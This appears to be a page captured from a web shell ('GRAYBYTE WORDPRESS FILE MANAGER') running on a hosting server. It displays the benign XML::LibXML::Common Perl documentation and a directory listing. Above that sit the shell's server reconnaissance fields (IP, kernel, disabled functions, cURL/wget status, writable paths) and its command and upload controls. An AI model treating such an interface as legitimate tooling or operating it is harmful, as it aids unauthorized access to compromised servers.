GRAYBYTE WORDPRESS FILE MANAGER6174

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /usr/local/lib64/perl5/XML/LibXML/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /usr/local/lib64/perl5/XML/LibXML//Common.pod
=head1 NAME

XML::LibXML::Common - Constants and Character Encoding Routines

=head1 SYNOPSIS



  use XML::LibXML::Common;

  $encodedstring = encodeToUTF8( $name_of_encoding, $sting_to_encode );
  $decodedstring = decodeFromUTF8($name_of_encoding, $string_to_decode );

=head1 DESCRIPTION

XML::LibXML::Common defines constants for all node types and provides interface
to libxml2 charset conversion functions.

Since XML::LibXML use their own node type definitions, one may want to use
XML::LibXML::Common in its compatibility mode:


=head2 Exporter TAGS



  use XML::LibXML::Common qw(:libxml);

C<<<<<< :libxml >>>>>> tag will use the XML::LibXML Compatibility mode, which defines the old 'XML_'
node-type definitions.



  use XML::LibXML::Common qw(:gdome);

C<<<<<< :gdome >>>>>> tag will use the XML::GDOME Compatibility mode, which defines the old 'GDOME_'
node-type definitions.



  use XML::LibXML::Common qw(:w3c);

This uses the nodetype definition names as specified for DOM.



  use XML::LibXML::Common qw(:encoding);

This tag can be used to export only the charset encoding functions of
XML::LibXML::Common.


=head2 Exports

By default the W3 definitions as defined in the DOM specifications and the
encoding functions are exported by XML::LibXML::Common.


=head2 Encoding functions

To encode or decode a string to or from UTF-8, XML::LibXML::Common exports two
functions, which provide an interface to the encoding support in C<<<<<< libxml2 >>>>>>. Which encodings are supported by these functions depends on how C<<<<<< libxml2 >>>>>> was compiled. UTF-16 is always supported and on most installations, ISO
encodings are supported as well.

This interface was useful for older versions of Perl. Since Perl >= 5.8
provides similar functions via the C<<<<<< Encode >>>>>> module, it is probably a good idea to use those instead.

=over 4

=item encodeToUTF8

  $encodedstring = encodeToUTF8( $name_of_encoding, $sting_to_encode );

The function will convert a byte string from the specified encoding to an UTF-8
encoded character string.


=item decodeToUTF8

  $decodedstring = decodeFromUTF8($name_of_encoding, $string_to_decode );

This function converts an UTF-8 encoded character string to a specified
encoding. Note that the conversion can raise an error if the given string
contains characters that cannot be represented in the target encoding.



=back

Both these functions report their errors on the standard error. If an error
occurs the function will croak(). To catch the error information it is required
to call the encoding function from within an eval block in order to prevent the
entire script from being stopped on encoding error.


=head2 A note on history

Before XML::LibXML 1.70, this class was available as a separate CPAN
distribution, intended to provide functionality shared between XML::LibXML,
XML::GDOME, and possibly other modules. Since there seems to be no progress in
this direction, we decided to merge XML::LibXML::Common 0.13 and XML::LibXML
1.70 to one CPAN distribution.

The merge also naturally eliminates a practical and urgent problem experienced
by many XML::LibXML users on certain platforms, namely mysterious misbehavior
of XML::LibXML occurring if the installed (often pre-packaged) version of
XML::LibXML::Common was compiled against an older version of libxml2 than
XML::LibXML.

=head1 AUTHORS

Matt Sergeant,
Christian Glahn,
Petr Pajas


=head1 VERSION

2.0210

=head1 COPYRIGHT

2001-2007, AxKit.com Ltd.

2002-2006, Christian Glahn.

2006-2009, Petr Pajas.

=cut


=head1 LICENSE

This program is free software; you can redistribute it and/or modify it under
the same terms as Perl itself.


[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
March 11 2024 08:32:03
root / root
0755
SAX
--
March 11 2024 08:32:03
root / root
0755
Attr.pod
4.024 KB
January 24 2024 15:13:41
root / root
0444
AttributeHash.pm
4.485 KB
January 24 2024 15:03:50
root / root
0444
Boolean.pm
1.563 KB
January 24 2024 15:03:50
root / root
0444
CDATASection.pod
1.284 KB
January 24 2024 15:13:41
root / root
0444
Comment.pod
1.363 KB
January 24 2024 15:13:41
root / root
0444
Common.pm
8.202 KB
January 24 2024 15:03:50
root / root
0444
Common.pod
3.586 KB
January 24 2024 15:13:41
root / root
0444
DOM.pod
6.229 KB
January 24 2024 15:13:41
root / root
0444
Devel.pm
4.91 KB
January 24 2024 15:03:50
root / root
0444
Document.pod
21.087 KB
January 24 2024 15:13:41
root / root
0444
DocumentFragment.pod
0.8 KB
January 24 2024 15:13:41
root / root
0444
Dtd.pod
1.991 KB
January 24 2024 15:13:41
root / root
0444
Element.pod
13.482 KB
January 24 2024 15:13:41
root / root
0444
ErrNo.pm
27.831 KB
January 24 2024 15:03:50
root / root
0444
ErrNo.pod
0.577 KB
January 24 2024 15:13:41
root / root
0444
Error.pm
8.45 KB
January 24 2024 15:03:50
root / root
0444
Error.pod
5.978 KB
January 24 2024 15:13:41
root / root
0444
InputCallback.pod
9.592 KB
January 24 2024 15:13:41
root / root
0444
Literal.pm
2.045 KB
January 24 2024 15:03:50
root / root
0444
Namespace.pod
3.283 KB
January 24 2024 15:13:41
root / root
0444
Node.pod
25.666 KB
January 24 2024 15:13:41
root / root
0444
NodeList.pm
7.313 KB
January 24 2024 15:03:50
root / root
0444
Number.pm
1.871 KB
January 24 2024 15:03:50
root / root
0444
PI.pod
2.218 KB
January 24 2024 15:13:41
root / root
0444
Parser.pod
27.786 KB
January 24 2024 15:13:41
root / root
0444
Pattern.pod
2.905 KB
January 24 2024 15:13:41
root / root
0444
Reader.pm
5.749 KB
January 24 2024 15:03:50
root / root
0444
Reader.pod
17.601 KB
January 24 2024 15:13:41
root / root
0444
RegExp.pod
1.537 KB
January 24 2024 15:13:41
root / root
0444
RelaxNG.pod
2.342 KB
January 24 2024 15:13:41
root / root
0444
SAX.pm
3.449 KB
January 24 2024 15:03:50
root / root
0444
SAX.pod
1.762 KB
January 24 2024 15:13:41
root / root
0444
Schema.pod
2.194 KB
January 24 2024 15:13:41
root / root
0444
Text.pod
5.47 KB
January 24 2024 15:13:41
root / root
0444
XPathContext.pm
3.147 KB
January 24 2024 15:03:50
root / root
0444
XPathContext.pod
11.491 KB
January 24 2024 15:13:41
root / root
0444
XPathExpression.pod
1.639 KB
January 24 2024 15:13:41
root / root
0444

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF